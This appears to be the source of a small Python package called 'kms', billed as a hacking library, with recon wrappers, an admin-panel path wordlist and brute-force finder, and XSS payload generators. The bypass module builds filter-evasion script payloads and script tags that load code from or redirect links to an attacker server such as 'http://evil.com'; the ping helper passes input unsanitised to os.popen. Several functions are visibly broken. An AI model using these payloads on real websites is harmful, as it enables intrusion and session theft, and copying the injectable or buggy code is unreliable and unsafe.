import hashlib
import base64

#Returns MD5 Hashed String
def MD5_hash(string):
    m = hashlib.md5()
    m.update(string.encode('utf-8'))
    return m.hexdigest()

#Returns sha256 Hashed String
def sha256_hash(string):
    m = hashlib.sha256()
    m.update(string.encode('utf-8'))
    return m.hexdigest()

#Returns Something That Encoded In OpenSSL Algorithm
def openssl_alg(string):
    h = hashlib.new("ripemd160")
    h.update(string)
    h.hexdigest()

def base64_encode(string):
    return base64.b64encode(string)

def base64_decode(string):
    return base64.b64decode(string)

def base32_encode(string):
    return base64.b32encode(string)

def base32_decode(string):
    return base64.b32decode(string)

def base16_encode(string):
    return base64.b16encode(string)

def base16_decode(string):
    return base64.b16decode(string)



import requests
import socket
import os

class IG:
    address = ""
    def __init__(self):
        self.address = "google.com"

    def a_records(self):
        return requests.get("https://api.hackertarget.com/hostsearch/?q=" + self.address).text

    def as_lookup(self):
        return requests.get("https://api.hackertarget.com/aslookup/?q=" + self.address).text

    def dns_lookup(self):
        return requests.get("https://api.hackertarget.com/dnslookup/?q=" + self.address).text

    def find_dns_servers(self):
        return requests.get("https://api.hackertarget.com/findshareddns/?q=" + self.address).text

    def http_headers(self):
        return requests.get("https://api.hackertarget.com/httpheaders/?q=" + self.address).text

    def ip_location(self):
        return requests.get("https://api.hackertarget.com/geoip/?q=" + self.address).text

    def page_links(self):
        return requests.get("https://api.hackertarget.com/pagelinks/?q=" + self.address).text

    def ping(self):
        return os.popen("ping -c 1" + self.address).read()

    def reverse_ip_lookup(self):
        return requests.get("https://api.hackertarget.com/reverseiplookup/?q=" + self.address).text

    def revere_dns(self):
        return requests.get("https://api.hackertarget.com/reversedns/?q=" + self.address).text

    def subnet_calc(self):
        return requests.get("https://api.hackertarget.com/subnetcalc/?q=" + self.address).text

    def tcp_port_scan(self):
        return requests.get("https://api.hackertarget.com/nmap/?q=" + self.address).text

    def traceroute(self):
        return requests.get("https://api.hackertarget.com/mtr/?q=" + self.address).text

    def whois(self):
        return requests.get("https://api.hackertarget.com/whois/?q=" + self.address).text

    def zone_transfer(self):
        return requests.get("https://api.hackertarget.com/zonetransfer/?q=" + self.address).text

    def get_ip(self):
        return socket.gethostbyname(self.address)



from .get_char_code import *

class xss:
    def __init__(self):
        self.hex_back = "%2E%2E%2f"
        self.hex_per = "%25"
        self.double_hex_back ="%252E%252E%252F"

    #Encode To Hexadecimal
    @staticmethod
    def encode_hexadecimal(string):
        ans = ""
        for char in string:
            for i,j in hexadecimal_char_codes.items():
                char2 = char.replace(j,"%" + i)
                if not char == char2:
                    ans += char2
        return ans

    #Double Encoding To Hexadecimal
    def double_encode_hexadecimal(self,string):
        one_encode = self.encode_hexadecimal(string)
        one_encode = one_encode.replace("%","%25")
        return one_encode

    #Encode Symbols To Hexadecimal
    @staticmethod
    def encode_symbol_hexadecimal(string):
        ans = ""
        for char in string:
            for i,j in hexadecimal_char_codes.items():
                if not (char.upper() in letters):
                    char2 = char.replace(j,"%" + i)
                    if not char == char2:
                        ans += char2
                else:
                    ans += char
                    break
        return ans

    #Double Encoding Symbols To Hexadecimal
    def double_encode_symbol_hexadecimal(self,string):
        one_encode = self.encode_symbol_hexadecimal(string)
        one_encode = one_encode.replace("%","%25")
        return one_encode



list_admin_finder_php = ["admin.php","login.php","adminctrl.php","adminpage.php"
,"admin-page.php","admin-login.php","admin-ctrl.php","admin-control.php",
"login-admin.php","control-admin.php","ctrladmin.php","ctrl-admin.php"
,"loginadmin.php","login-admin.php","pageadmin.php","page-admin.php",
"admincontroller.php","admin-controller.php","controller-admin.php",
"controller-admin.php","panel.php","admin-panel.php","adminpanel.php",
"paneladmin.php","panel-admin.php"]

list_admin_finder_asp = ["admin","login","amdinctrl","amdinpage"
,"admin-page","admin-login","admin-ctrl","admin-control",
"login-admin","control-admin","ctrladmin","ctrl-admin"
,"loginadmin","login-admin","pageadmin","page-admin",
"admincontroller","admin-controller","controller-admin",
"controller-admin","panel","admin-panel","adminpanel",
"paneladmin","panel-admin"]



import urllib.request
from bs4 import BeautifulSoup

class Inspector:
    url = ""
    data = ""
    bs = ""
    def __init__(self,url):
        self.url=url
        self.data = urllib.request.urlopen(url)
        self.bs = BeautifulSoup(self.data,'html.parser')

    #Get All Of A Tag In Page
    def get_all(self,tag):
        return self.bs.find_all(tag)

    #Get Title Of The Page
    def get_title(self):
        return self.bs.title.text

    #Get A Good Style Of Page Source Code
    def get_source(self):
        return self.bs.prettify()

    #Get Everything In Code(In Html Tags){A List}
    def get_html_childs(self):
        return self.bs.children

    #get Everything In Body
    def get_body(self):
        html = list(self.bs.children)
        max = [0,0]
        for i in html:
            if len(i) > max[0]:
                max[0] = len(i)
                max[1] = html.index(i)
        if max != 0:
            html = html[max[1]]
            return list(html.children)
        else:
            return "Nothing!!!"

    #Get Text Of A Tag
    def get_text(self,tag,other=""):
        return self.bs.find_all(tag,other)[0].get_text()

    #Get Some Tag Into Another Tag
    def css_selector(self,string):
        return self.bs.select(string)



import codecs
import html
from .get_char_code import *
from .functions import *
from .classes import *

def xss_reflected_bypass(string):
    a = []
    all = []
    ############################################
    #A Method To Bypass Policy.
    a.append(string.replace("<script>","<<ScRipT>").replace("</script>","//<</sCrIPt>"))
    ############################################
    #Bypass Wthen (") Character Is Filtered.
    #Example:
    #<script>alert('test');</script>
    #And Bypass Like That:
    #<script>alert(String.fromCharCode(116 101 115 116));</script>
    a.append(from_char_code(string))
    ############################################
    #A Method To Bypass Policy.
    ans = '<IMG """>' + string + '">'
    ans = ans.lower().replace('<script>','<SCRIPT>')
    ans = ans.lower().replace('</script>','</SCRIPT>')
    a.append(ans)
    ############################################
    #A Method To Bypass Policy.
    a.append("<sCr" + string + "IpT>")
    ############################################
    #A Method To Bypass Policy.
    a.append(string.lower().replace("<script>","<ScR<script>Ipt>"))
    ############################################
    #Helps You To Bypass With Obfuscation.
    a.append("Obfuscate Your Code Here : http://dean.edwards.name/packer/")
    ############################################
    #A Method To Bypass Policy.
    a.append("\">" + string.replace("\"","\\").replace("\'","\\"))
    ############################################
    #A Method To Bypass Policy.
    last_str = string.replace("<script>","<script&param=>").replace("</script>","</&param=script>")
    a.append("You Should Replace 'param' With Target Variable :" + last_str)
    ############################################
    #Encode Symbols Of String To Hexadecimal
    a = xss()
    a.append(encode_symbol_hexadecimal(string))
    ############################################
    #Double Encode Symbols Of String To Hexadecimal
    a = xss()
    a.append(double_encode_symbol_hexadecimal(string))
    ############################################
    return a

#Enter Your Server Link Like That:
#http://evil.com
def xss_exploits(link):
    a = []
    ############################################
    #A Method That Change Link Of A Website To Your Evil Server.
    a.append("<script>window.onload = function() {var AllLinks=document.getElementsByTagName(\"a\");\
    AllLinks[0].href = \"{0}\"; }</script> ".format(link))
    ############################################
    #A Method To Bypass Policy.
    a.append("<SCRIPT%20a=\">\"%20SRC=\"{0}\"></SCRIPT>".format(link))
    ############################################
    return a

#Enter Taget With This Syntax:
#http://vulnerable.com/vul.html?default=something
#Important To Get Target Site Until '='
#Enter String Like That:
#<script>Your Code</script>
def xss_dom_bypass(target,exploit_string):
    a = []
    ############################################
    # Variables
    #Get The Key Of Vulnerable Site.
    #For Example Get 'name' In This Case:
    #http://vulnerable.com/vul.html?name=something
    key = target.split("?")[-1].split("=")[0]
    #Get The Target Url
    url = target.split("?")[0]
    ############################################
    #A Method That Just Add # To The First Of Exploit String.
    a.append(target + "#" + exploit_string)
    ############################################
    #A Mathod To Bypass Policy
    ready_string = url + "?payload=" + key + "=" + exploit_string + "&" + key + "=something"
    a.append(ready_string)
    ############################################
    return a



import os
import builtwith
import requests
import urllib.parse
from .ig import *
from .hash import *
from .list import *
from colorama import Fore
from .page_inspect import *
from .bypass import *
from .classes import *

def find_admin_php(address):
    ok_addresses = []
    for i in list_admin_finder_php:
        #Send A Request To Target
        request = requests.get(address + "/" + i)
        #check If Target Valid Or Not
        if request.status_code == 200:
            ok_addresses.append(address + "/" + i)
    return ok_addresses

def find_admin_asp(address):
    ok_addresses = []
    for i in list_admin_finder_asp:
        #Send A Request To Target
        request = requests.get(address + "/" + i)
        #check If Target Valid Or Not
        if request.status_code == 200:
            ok_addresses.append(address + "/" + i)
    return ok_addresses

def find_cms(address):
    #check That Address builtwith What?
    #Maybe Joomla Maybe ...
    return builtwith.builtwith(address)


def url_encode(string):
    #Encode Url
    return urllib.parse.quote(string)



import setuptools
with open("README.md", "r") as fh:
    long_description = fh.read()
setuptools.setup(
     name='kms',
     version='1.0.1.2',
     author="Ar$h1a",
     author_email="1arhacker1@gmail.com",
     description="A Hacking Library That Helps You To Create Hacking Tools.",
     long_description=long_description,
   long_description_content_type="text/markdown",
     url="https://github.com/ArshiaPRG/kms",
     packages=setuptools.find_packages(),
     classifiers=[
         "Programming Language :: Python :: 3",
         "License :: OSI Approved :: MIT License",
         "Operating System :: OS Independent",
     ],
 )



from .get_char_code import *

def part(your_string,splitter):
    answers = []
    #I Named in_splitter_string To "String Store Variable"
    in_splitter_string = ""
    #I Named in_splitter Variable To "Check Variable"
    in_splitter = False
    #Do Something With All Characters
    for char in your_string:
        #Check If Character Is splitter Or Not
        #if It Was:
        if char == splitter:
            #Check If Current Character Is Between 2 splitter Or Not
            if not in_splitter:
                #If It Wasnt Change The "Check Variable" Value
                in_splitter = True
            else:
                # If It Was, Change The "Check Variable" Value
                in_splitter = False
                #Add String To answers Array
                answers.append(in_splitter_string)
                #Again Clear The "String Store Variable"
                in_splitter_string = ""
        else:
            #If Character Wasnt splitter
            if in_splitter:
                #Check If Between To splitter That If It Was True
                #This Will Be Runned:
                in_splitter_string += char
                #In Fact If Now We Are Between Two splitter,
                #We Will Add Current Character To "String Store Variable"
    return answers

def from_char_code(string):
    #Get Part Of String That Exists Between Two (")
    parts = part(string,"\"")
    answer = ""
    allofanswers = []
    #Do Something With All Parts That Exists Between Two (")
    for part in parts:
        #Replaces The Characters With Ascii Codes
        for x,y in char_codes.items():
            part = part.replace(y," " + x + " ,")
            answer = part
        #Give A Clear Value!
        #If You Check The Loop You Can Underestand That Program
        # Give A Resault Like That:
        # "110 , 120 , 140 ,"
        # As You See Contains Two Addtion Character!
        # We Are Removing Them Here:
        answer = answer[:-2]
        #Bring answer Between '(' And ')'
        answer = "(" + answer + ")"
        allofanswers.append(answer)
    #Add String.fromCharCode To The answer
    fin = ["String.fromCharCode" + i for i in allofanswers]
    #Do Something With All Parts That Exists In Two (")
    for i in parts:
        for j in fin:
            #We Create New String That Replace
            #The Last String With New Encoded String.
            string = string.replace(i,j).replace("\"","")
    #Now, We Will Do Every Thing For (') That We Did For (") Too!
    parts = part(string,"\'")
    answer = ""
    allofanswers = []
    for part in parts:
        for x,y in char_codes.items():
            part = part.replace(y," " + x + " ,")
            answer = part
        answer = answer[:-2]
        answer = "(" + answer + ")"
        allofanswers.append(answer)
    fin = ["String.fromCharCode" + i for i in allofanswers]
    for i in parts:
        for j in fin:
            string = string.replace(i,j).replace("\'","")
    return string
